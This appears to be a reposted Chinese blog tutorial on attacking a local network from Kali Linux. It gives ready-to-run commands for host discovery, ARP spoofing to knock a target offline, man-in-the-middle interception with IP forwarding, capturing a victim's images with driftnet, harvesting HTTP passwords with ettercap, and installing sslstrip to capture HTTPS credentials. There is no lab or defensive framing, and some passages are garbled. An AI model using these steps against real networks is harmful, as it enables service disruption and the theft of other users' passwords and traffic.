这篇文章主要给大家介绍了kali的局域网攻击,小编觉得这篇文章还是不错的,使用起来也是非常方便的,需要的朋友可以参考下

目录

总结

前言

很久以前的博客才发现，发布一下。

这个系列以后有时间再做。

arp攻击

arp路由链表,感兴趣的自行百度,我的博客我的笔记.

路由指向

介绍两个东西.echo 0 >/proc/sys/net/ipv4/ip_forward #让经过的数据不留通 echo 1 >/proc/sys/net/ipv4/ip_forward #让数据流通内网扫描这个在百度上你可以看到很多相关的方式,比如nmap fping但是基本上扫描结果不太号,在虚拟机上你会发现你把主机的防火墙关了都扫不到主机.这里使用netdiscover当然这里也写几个nmap之类的指令nmap -PR -sL ip fping -asg ip netdiscover -i kali网卡 -r ip(网段) netdiscover -i eth0 -r 192.168.43.1/30扫描速度是比较慢的

断网攻击arpspoof -i kali的网卡 -t 目标地址 目标网卡 arpspoof -i eth0 -t 192.168.43.7 192.168.43.1

arp欺骗信息获取

1.arpspoof -i eth0 -t 192.168.43.7 192.168.43.1 开始欺骗让数据经过你的电脑2.echo 1 >/proc/sys/net/ipv4/ip_forward 放掉数据包获取图片使用工具difinetdifinet -i eth0(网卡)实际操作:

图片会在那里临时保存

由于网络问题可能会有点卡

获取HTTP连接的密码信息

使用ettercap其他的操作还是一样的,要开启arp欺骗ettercap -Tq -i eth0-T 文本模式 q 安静模式 i 网卡

然后等待即可.不过现在都是https,作用不大出现中文怎么办,直接赋值中文乱码,之后解码即可百度搜索url解码或者直接使用python中文编码 from urllib.parse import quote,unquote str1 = '中国' str2=quote(strl) print(str2) 解码 print(unquote(str2))获取HTTPS的密码信息这个要先修改以下ettercap的配置文件.vim /etc/ettercap/etter.conf

使用工具 sslstrip那个吐槽一下 kali 2020是没有sslstrip的原因是没有安装python2的pip 只有pip3记住一定要先安装python2在kali里面python 默认为python2 当然你可以用ln -s 修改一下.apt install python 这个时候会自动安装python 2.7然后输入以下指令安装sslstripgit clone https://github.com/moxie0/sslstrip.git cd sslstrip python setup.py install这个是python2的,如果没猜错可能会遇到OpenSSL报错说没有这个模块pip install pyOpenSSL

总结